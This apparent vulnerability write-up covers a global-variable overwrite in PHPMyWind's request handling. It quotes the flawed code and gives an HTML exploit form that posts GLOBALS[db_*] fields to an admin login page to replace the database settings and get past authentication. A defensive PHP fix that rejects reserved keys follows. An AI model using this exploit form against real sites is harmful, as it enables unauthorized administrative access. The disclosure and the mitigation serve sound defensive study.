Code:

define('PHPMYWIND_INC', preg_replace("/[\/\\\\]{1,}/", '/', dirname(__FILE__)));
define('PHPMYWIND_ROOT', preg_replace("/[\/\\\\]{1,}/", '/', substr(PHPMYWIND_INC, 0, -8)));
define('PHPMYWIND_DATA', PHPMYWIND_ROOT.'/data');
define('PHPMYWIND_UPLOAD', PHPMYWIND_ROOT.'/uploads');
define('PHPMYWIND_BACKUP', PHPMYWIND_DATA.'/backup');
define('IN_PHPMYWIND', TRUE); // Issue the login pass

// Check externally passed values and escape ' " style data
function _RunMagicQuotes(&$strvar)
{
    if(!get_magic_quotes_gpc())
    {
        if(is_array($strvar))
        {
            foreach($strvar as $_key => $_value)
                $strvar[$_key] = _RunMagicQuotes($_value);
        }
        else
        {
            $strvar = trim(addslashes($strvar));
        }
    }
    return $strvar;
}

// Register request values directly under their variable names
foreach(array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
        ${$_k} = _RunMagicQuotes($_v);
}

// Session save path
$sess_savepath = PHPMYWIND_DATA.'/sessions/';
if(is_writable($sess_savepath) && is_readable($sess_savepath))
{
    session_save_path($sess_savepath);
}

// Upload save paths
$cfg_image_dir = PHPMYWIND_UPLOAD.'/image';
$cfg_soft_dir = PHPMYWIND_UPLOAD.'/soft';
$cfg_media_dir = PHPMYWIND_UPLOAD.'/media';

// System version number
$cfg_version = file_get_contents(PHPMYWIND_DATA."/update/version.txt");

// Global configuration file
require_once(PHPMYWIND_INC.'/config.cache.php');

// Common global functions
require_once(PHPMYWIND_INC.'/common.func.php');

// Include the database class
require_once(PHPMYWIND_INC.'/conn.inc.php');

// ..... (rest omitted)

Part of this is copied from dede. dede checks whether a key contains keywords such as GLOBALS, although it does not account for multi-dimensional arrays. The code shown in this article has no check at all, so GLOBALS gets registered.

exp:

<html>
<head><title>PHPMyWind Exp</title></head>
<body>
<div class="login_warp">
<div class="login_area">
<form name="login" method="post" action="http://[target-host]/act/admin/login.php" onSubmit="return CheckForm()">
<input type="text" name="username" id="username" class="login_area_input" maxlength="20" />
<input type="password" name="password" id="password" class="login_area_input mar8" maxlength="16" />
<input type="text" name="GLOBALS[db_host]" value="localhost" maxlength="16" />
<input type="text" name="GLOBALS[db_user]" value="root" maxlength="16" />
<input type="text" name="GLOBALS[db_pwd]" value="123456" maxlength="16" />
<input type="text" name="GLOBALS[db_name]" value="db_name" maxlength="16" />
<input type="text" name="GLOBALS[db_tablepre]" value="pwm_admin" maxlength="16" />
<div class="check_str">
<input type="text" name="validate" class="login_area_ckstr" id="validate" maxlength="4" />
<span><img id="ckstr" name="ckstr" src="data/captcha/ckstr.php" title="看不清?点击更换" align="absmiddle" style="cursor:pointer;" onClick="this.src=this.src+'?'" />
<a href="javascript:;" onClick="var v=document.getElementById('ckstr');v.src=v.src+'?';return false;">看不清?</a></span></div>
<div class="hr_20"></div>
<input type="submit" class="login_area_btn" value="提交" style="cursor:pointer;" />
<input type="hidden" name="dopost" value="login" />
</form>
</div>
</div>
</body>
</html>

Author: Samy
Source: http://hi.baidu.com/0x7362/blog
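The missing key check discussed above, sketched as a mitigation. This is an added example, not PHPMyWind or DedeCMS code: the function names, the reserved-name list and the sample input are assumptions, and it checks keys at every nesting depth, which goes beyond the single-level check the post attributes to dede.

```php
<?php
// Added example; names below are hypothetical, not from PHPMyWind or DedeCMS.
// Names that request input must never be allowed to register.
const RESERVED_KEY_PATTERN =
    '/\A(?:GLOBALS|_GET|_POST|_COOKIE|_REQUEST|_SERVER|_ENV|_FILES|_SESSION)\z/';

// Return the first reserved key found at any depth, or null if there is none.
function find_reserved_key(array $input, int $depth = 0): ?string
{
    if ($depth > 8) {
        return '(nesting too deep)'; // refuse rather than leave levels unchecked
    }
    foreach ($input as $key => $value) {
        if (preg_match(RESERVED_KEY_PATTERN, (string)$key)) {
            return (string)$key;
        }
        if (is_array($value)) {
            $hit = find_reserved_key($value, $depth + 1);
            if ($hit !== null) {
                return $hit;
            }
        }
    }
    return null;
}

// Copy request values into an isolated array instead of creating global variables.
function collect_request_vars(array ...$sources): array
{
    $vars = [];
    foreach ($sources as $source) {
        $hit = find_reserved_key($source);
        if ($hit !== null) {
            throw new InvalidArgumentException("reserved key in request: $hit");
        }
        foreach ($source as $key => $value) {
            $vars[$key] = $value;
        }
    }
    return $vars;
}

// Constructed sample input shaped like the form fields on this page.
$post = ['username' => 'a', 'password' => 'b', 'GLOBALS' => ['db_host' => 'localhost']];
try {
    collect_request_vars([], $post, []);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
// Constructed nested case: the reserved name sits one level down.
var_dump(find_reserved_key(['a' => ['_SESSION' => ['admin' => 1]]]));
```

Called in place of the `${$_k} = ...` loop, this keeps request data out of the global symbol table entirely, so configuration such as the `db_*` values can only come from the application's own config file.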